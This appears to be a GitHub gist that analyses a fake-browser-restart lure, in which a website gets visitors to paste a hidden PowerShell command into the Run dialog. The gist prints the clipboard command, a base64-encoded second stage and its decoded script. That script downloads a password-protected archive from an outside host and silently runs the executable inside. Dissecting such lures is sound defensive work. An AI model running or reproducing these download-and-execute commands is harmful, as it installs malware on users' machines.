Last active
April 14, 2025 17:47
-
-
Save danneu/19657b8a345436a88abbbbc2cce6c935 to your computer and use it in GitHub Desktop.
Revisions
-
danneu revised this gist
Apr 14, 2025 . No changes.There are no files selected for viewing
-
Apr 14, 2025 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,3 @@ # The website gets you to win-r + cmd-v + enter. This is what it put in your clipboard: cmd /c powershell -w hidden -c "$SESSION='i'+'e'+'x'; $SOCKET='i'+'w'+'r'; $UPDATE='https:/'+'/kutt.i'+'t/ReStarT'; &($SESSION) ((&($SOCKET) $UPDATE -UseBasicParsing).Content)"# Initiate forse restart browser This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,3 @@ # https://kutt.it/ReStarT redirects to a snippet site with this payload: $BIbfLCXe=[System.Text.Encoding]::Unicode; $kUwulDoJ=[Convert]::FromBase64String('JAB6AGkAcABVAHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAGUAdgAuAGEAegB1AHIAZQAuAGMAbwBtAC8AZABvAHcAbgB1AHAAZAB0AGUAcwAvADAAYgBlADcAOQA3ADMANgAtADYAYwBhADkALQA0ADkAMQBiAC0AYgBlADIAMQAtADAAMAAxADUAOQAzAGUANAA4AGQAOAA4AC8AXwBhAHAAaQBzAC8AZwBpAHQALwByAGUAcABvAHMAaQB0AG8AcgBpAGUAcwAvAGIAYQAwADMAYQA1AGIANgAtADIAMgAyADEALQA0AGYAMAAwAC0AYQBkADEAMgAtADEAMQBmADkAZQBhAGEANwBhADkAYgBkAC8AaQB0AGUAbQBzAD8AcABhAHQAaAA9AC8AcgB1AG4ANAA3AC4AegBpAHAAJgB2AGUAcgBzAGkAbwBuAEQAZQBzAGMAcgBpAHAAdABvAHIAJQA1AEIAdgBlAHIAcwBpAG8AbgBPAHAAdABpAG8AbgBzACUANQBEAD0AMAAmAHYAZQByAHMAaQBvAG4ARABlAHMAYwByAGkAcAB0AG8AcgAlADUAQgB2AGUAcgBzAGkAbwBuAFQAeQBwAGUAJQA1AEQAPQAwACYAdgBlAHIAcwBpAG8AbgBEAGUAcwBjAHIAaQBwAHQAbwByACUANQBCAHYAZQByAHMAaQBvAG4AJQA1AEQAPQBtAGEAaQBuACYAcgBlAHMAbwBsAHYAZQBMAGYAcwA9AHQAcgB1AGUAJgAlADIANABmAG8AcgBtAGEAdAA9AG8AYwB0AGUAdABTAHQAcgBlAGEAbQAmAGEAcABpAC0AdgBlAHIAcwBpAG8AbgA9ADUALgAwACYAZABvAHcAbgBsAG8AYQBkAD0AdAByAHUAZQAiAAoAJABwAGEAcwBzAHcAbwByAGQAIAA9ACAAIgBRAHcAZQBxAHcAZQAxADIAMwAxADIAMwAiAAoACgAkAGIAYQBzAGUARgBvAGwAZABlAHIAIAA9ACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE4AVgBJAEQASQBBAFwAVQBwAGQAYQB0AGUAUwBlAHIAdgBpAGMAZQAiAAoAJABtAGEAeABBAHQAdABlAG0AcAB0AHMAIAA9ACAAMwAKACQAZABvAHcAbgBsAG8AYQBkAGUAZAAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAZgBvAHIAIAAoACQAaQAgAD0AIAAxADsAIAAkAGkAIAAtAGwAZQAgACQAbQBhAHgAQQB0AHQAZQBtAHAAdABzADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAHIAYQBuAGQAIAA9ACAALQBqAG8AaQBuACAAKAAoADYANQAuAC4AOQAwACkAIAArACAAKAA5ADcALgAuADEAMgAyACkAIAArACAAKAA0ADgALgAuADUANwApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADUAIAB8ACAAJQAgAHsAWwBjAGgAYQByAF0AJABfAH0AKQAKACAAIAAgACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgAgAD0AIAAiACQAYgBhAHMAZQBGAG8AbABkAGUAcgBcAFQAZQBtAHAAJAByAGEAbgBkACIACgAgACAAIAAgACQAegBpAHAAUABhAHQAaAAgAD0AIAAiACQAdABhAHIAZwBlAHQARgBvAGwAZABlAHIAXAB1AHAAZABhAHQAZQBwAGEAYwBrAC4AegBpAHAAIgAKACAAIAAgACAAJABlAHgAdAByAGEAYwB0AFAAYQB0AGgAIAA9ACAAIgAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByAFwAQwBhAGMAaABlACIACgAKACAAIAAgACAAdAByAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgALQBuAG8AdAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKACMAIAB6AFMAYQBuAGgATgBqAFIAZQBiAHgAZQBnAEMAcABPAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIAAkAG4AZQB0AFYAZQByACAAPQAgACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrACAAUwBlAHQAdQBwAFwATgBEAFAAXAB2ADQAXABGAHUAbABsACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuAFIAZQBsAGUAYQBzAGUACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAG4AZQB0AFYAZQByACAALQBhAG4AZAAgACQAbgBlAHQAVgBlAHIAIAAtAGcAZQAgADMANwA4ADMAOAA5ACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAIgAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcAAuAEgAdAB0AHAAQwBsAGkAZQBuAHQAXQA6ADoAbgBlAHcAKAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABjAGwAaQBlAG4AdAAuAEQAZQBmAGEAdQBsAHQAUgBlAHEAdQBlAHMAdABIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIgAsACAAIgBNAG8AegBpAGwAbABhAC8ANQAuADAAIgApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAHMAIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AEIAeQB0AGUAQQByAHIAYQB5AEEAcwB5AG4AYwAoACQAegBpAHAAVQByAGwAKQAuAFIAZQBzAHUAbAB0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAegBpAHAAUABhAHQAaAAsACAAJABiAHkAdABlAHMAKQAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAFUAcwBlAHIALQBBAGcAZQBuAHQAIgAsACAAIgBNAG8AegBpAGwAbABhAC8ANQAuADAAIgApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAegBpAHAAVQByAGwALAAgACQAegBpAHAAUABhAHQAaAApAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB6AGkAcABQAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkACAAPQAgACQAdAByAHUAZQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAKACMAIABYAHMAbgB6AEoAVAB6AFcATgByAGkAdwBBAHEAVgBaAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEACgAgACAAIAAgAH0ACgB9AAoACgBpAGYAIAAoAC0AbgBvAHQAIAAkAGQAbwB3AG4AbABvAGEAZABlAGQAKQAgAHsAIABlAHgAaQB0ACAAfQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARgBpAGwAZQBTAHkAcwB0AGUAbQAKAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AWgBpAHAARgBpAGwAZQBdADoAOgBFAHgAdAByAGEAYwB0AFQAbwBEAGkAcgBlAGMAdABvAHIAeQAoACQAegBpAHAAUABhAHQAaAAsACAAJAB0AGEAcgBnAGUAdABGAG8AbABkAGUAcgApAAoACgAkAHMAZQB2AGUAbgBaAGkAcABQAGEAdABoACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACIANwB6AHIALgBlAHgAZQAiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAkAGEAcgBjAGgAaQB2AGUANwB6ACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHQAYQByAGcAZQB0AEYAbwBsAGQAZQByACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACIAKgAuADcAegAiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKACMAIABRAHUAYgBNAEsAcgBiAHMAcgBuAFUARgB0AEIARgBQAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAUABhAHQAaAAgAC0AbwByACAALQBuAG8AdAAgACQAYQByAGMAaABpAHYAZQA3AHoAKQAgAHsAIABlAHgAaQB0ACAAfQAKAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABzAGUAdgBlAG4AWgBpAHAAUABhAHQAaAAuAEYAdQBsAGwATgBhAG0AZQAgAGAACgAgACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAeAAiACwAIAAiAGAAIgAkACgAJABhAHIAYwBoAGkAdgBlADcAegAuAEYAdQBsAGwATgBhAG0AZQApAGAAIgAiACwAIAAiAC0AbwAkAGUAeAB0AHIAYQBjAHQAUABhAHQAaAAiACwAIAAiAC0AcAAkAHAAYQBzAHMAdwBvAHIAZAAiACwAIAAiAC0AeQAiACAAYAAKACAAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBXAGEAaQB0AAoACgAkAGUAeABlAEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQB4AHQAcgBhAGMAdABQAGEAdABoACAALQBSAGUAYwB1AHIAcwBlACAALQBGAGkAbAB0AGUAcgAgACoALgBlAHgAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoAaQBmACAAKAAkAGUAeABlAEYAaQBsAGUAKQAgAHsACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQB4AGUARgBpAGwAZQAuAEYAdQBsAGwATgBhAG0AZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4ACgB9AA=='); Invoke-Expression (${BIbfLCXe}.GetString(${kUwulDoJ})) This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,64 @@ # This is what the base64 blob decodes to: $zipUrl = "https://dev.azure.com/downupdtes/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true" $password = "Qweqwe123123" $baseFolder = "$env:APPDATA\NVIDIA\UpdateService" $maxAttempts = 3 $downloaded = $false for ($i = 1; $i -le $maxAttempts; $i++) { $rand = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | % {[char]$_}) $targetFolder = "$baseFolder\Temp$rand" $zipPath = "$targetFolder\updatepack.zip" $extractPath = "$targetFolder\Cache" try { if (-not (Test-Path $targetFolder)) { New-Item -ItemType Directory -Path $targetFolder -Force | Out-Null New-Item -ItemType Directory -Path $extractPath -Force | Out-Null # zSanhNjRebxegCpO } $netVer = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -ErrorAction SilentlyContinue).Release if ($netVer -and $netVer -ge 378389) { Add-Type -AssemblyName "System.Net.Http" $client = [System.Net.Http.HttpClient]::new() $client.DefaultRequestHeaders.Add("User-Agent", "Mozilla/5.0") $bytes = $client.GetByteArrayAsync($zipUrl).Result [System.IO.File]::WriteAllBytes($zipPath, $bytes) } else { $wc = New-Object System.Net.WebClient $wc.Headers.Add("User-Agent", "Mozilla/5.0") $wc.DownloadFile($zipUrl, $zipPath) } if (Test-Path $zipPath) { $downloaded = $true break } } catch { # XsnzJTzWNriwAqVZ Start-Sleep -Seconds 1 } } if (-not $downloaded) { exit } Add-Type -AssemblyName System.IO.Compression.FileSystem [IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $targetFolder) $sevenZipPath = Get-ChildItem -Path $targetFolder -Recurse -Filter "7zr.exe" | Select-Object -First 1 $archive7z = Get-ChildItem -Path $targetFolder -Recurse -Filter "*.7z" | Select-Object -First 1 # QubMKrbsrnUFtBFP if (-not $sevenZipPath -or -not $archive7z) { exit } Start-Process -FilePath $sevenZipPath.FullName ` -ArgumentList "x", "`"$($archive7z.FullName)`"", "-o$extractPath", "-p$password", "-y" ` -WindowStyle Hidden -Wait $exeFile = Get-ChildItem -Path $extractPath -Recurse -Filter *.exe | Select-Object -First 1 if ($exeFile) { Start-Process -FilePath $exeFile.FullName -WindowStyle Hidden }